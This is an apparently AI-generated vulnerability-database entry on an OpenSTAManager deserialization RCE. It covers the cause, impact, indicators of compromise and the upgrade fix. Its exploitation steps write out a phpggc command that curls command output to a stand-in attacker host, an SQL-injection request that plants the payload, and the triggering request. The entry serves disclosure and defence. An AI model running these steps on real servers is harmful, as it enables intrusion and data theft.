
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-29782 is a Remote Code Execution (RCE) vulnerability in OpenSTAManager caused by insecure PHP deserialization in the OAuth2 module. The oauth2.php endpoint is unauthenticated ($skip_permissions = true) and calls unserialize() on attacker-controlled data from the zz_oauth2 database table without restricting allowed classes. All versions up to and including 2.10.1 are affected; version 2.10.2 contains the fix. The vulnerability was disclosed on April 1, 2026, and carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory).
The root cause is CWE-502 (Deserialization of Untrusted Data): src/Models/OAuth2.php calls unserialize() at lines 151 and 193 without the allowed_classes parameter, permitting instantiation of any class available in the Composer autoloader. The attack chain begins at the unauthenticated oauth2.php endpoint, which reads the state GET parameter and fetches the corresponding zz_oauth2 record; the configure() call then triggers checkTokens() → getAccessToken() → unserialize($this->access_token). An attacker first writes a malicious serialized PHP object (gadget chain Laravel/RCE22 from phpggc) into the access_token column — achievable via the related SQL injection in the Aggiornamenti module (GHSA-2fr7-cc4f-wh98) — and then triggers deserialization with an unauthenticated GET request. The gadget chain fires PendingBroadcast.__destruct() during PHP error cleanup (after a 500 response), ultimately calling system($command) as www-data (GitHub Advisory, OSM Security Advisory).
Successful exploitation grants arbitrary OS command execution as the www-data web server user, enabling full confidentiality compromise (reading server files, database credentials, API keys), integrity compromise (writing web shells, installing backdoors, modifying application code), and availability impact (deleting files, causing denial of service). The www-data context also allows lateral movement to other systems reachable from the server network. The chained nature of the attack (SQL injection + deserialization) means an attacker with admin credentials can achieve unauthenticated RCE as a second stage (GitHub Advisory).
A fully functional Python proof-of-concept exploit (exploit.py + listener.py) is publicly available in the GitHub Security Advisory, using phpggc to generate the Laravel/RCE22 gadget chain payload (OSM Security Advisory). The exploit requires admin credentials only for the SQL injection payload injection step; the RCE trigger itself is completely unauthenticated. As of the time of reporting, there is no evidence of in-the-wild exploitation, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.038% (24th percentile), indicating low but non-zero exploitation probability (GitHub Advisory).
/oauth2.php and /actions.php endpoints.phpggc to generate a Laravel/RCE22 serialized PHP object that executes the desired command (e.g., curl attacker-host/rce-$(id|base64 -w0)):php phpggc Laravel/RCE22 system 'curl http://attacker:9999/rce-$(id|base64 -w0)'/actions.php using the op=risolvi-conflitti-database handler in the Aggiornamenti module to execute arbitrary SQL, inserting the serialized payload into zz_oauth2.access_token. Include DDL statements (CREATE TABLE/DROP TABLE) to force an implicit MySQL commit and bypass the transaction rollback:POST /actions.php
op=risolvi-conflitti-database&id_module=<ID>&queries=["DELETE FROM zz_oauth2 WHERE state='poc-xxx'","INSERT INTO zz_oauth2 (..., state, access_token, ...) VALUES (..., 'poc-xxx', 0x<hex_payload>, ...)","CREATE TABLE IF NOT EXISTS _t(i INT)","DROP TABLE IF EXISTS _t"]oauth2.php with the injected state value:GET /oauth2.php?state=poc-xxx&code=xThe server responds with HTTP 500, but PendingBroadcast.__destruct() fires during PHP error cleanup and executes the command as www-data.Network:
/oauth2.php with a state parameter matching a value recently inserted into the database (e.g., poc- prefix or random alphanumeric string)curl or similar commands executed via RCE)/actions.php with op=risolvi-conflitti-database containing large hex-encoded queries payloadsLogs:
GET /oauth2.php?state=<random>&code=x returning HTTP 500PendingBroadcast or missing hasExpired() method/actions.php with the risolvi-conflitti-database operationDatabase:
zz_oauth2 table with unusual name, class, or binary access_token values_poc_ddl_commit or _t in the database schemaFile System:
www-data user (web shells, backdoors)/tmp/phpggc/ directory on the server (if the attacker installed phpggc directly)Process:
curl, bash, wget, python) (OSM Security Advisory)Upgrade OpenSTAManager to version 2.10.2 or later, which restricts unserialize() calls in src/Models/OAuth2.php to only allow AccessToken::class via the allowed_classes parameter, preventing arbitrary gadget chain instantiation (OSM Release v2.10.2, Patch Commit). If immediate upgrade is not possible, consider the following interim mitigations: (1) restrict database write access to the zz_oauth2 table to authorized users only; (2) add authentication to oauth2.php by removing $skip_permissions = true or validating the state parameter against a session-stored value; (3) deploy a WAF rule to block unauthenticated requests to /oauth2.php. Version 2.10.2 also patches the related SQL injection vulnerabilities in the Aggiornamenti module (GHSA-2fr7-cc4f-wh98) that enable the payload injection step (GitHub Advisory).
The vulnerability was discovered and reported by security researcher Omar Ramirez (GitHub: ormzro), who published a detailed advisory including fully functional exploit scripts (OSM Security Advisory). The advisory was covered by security aggregators including CVEFeed, VulDB, and Infinitsec shortly after disclosure (Infinitsec Blog). The OpenSTAManager maintainers responded promptly, releasing the patched version 2.10.2 and addressing multiple related SQL injection vulnerabilities in the same release.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."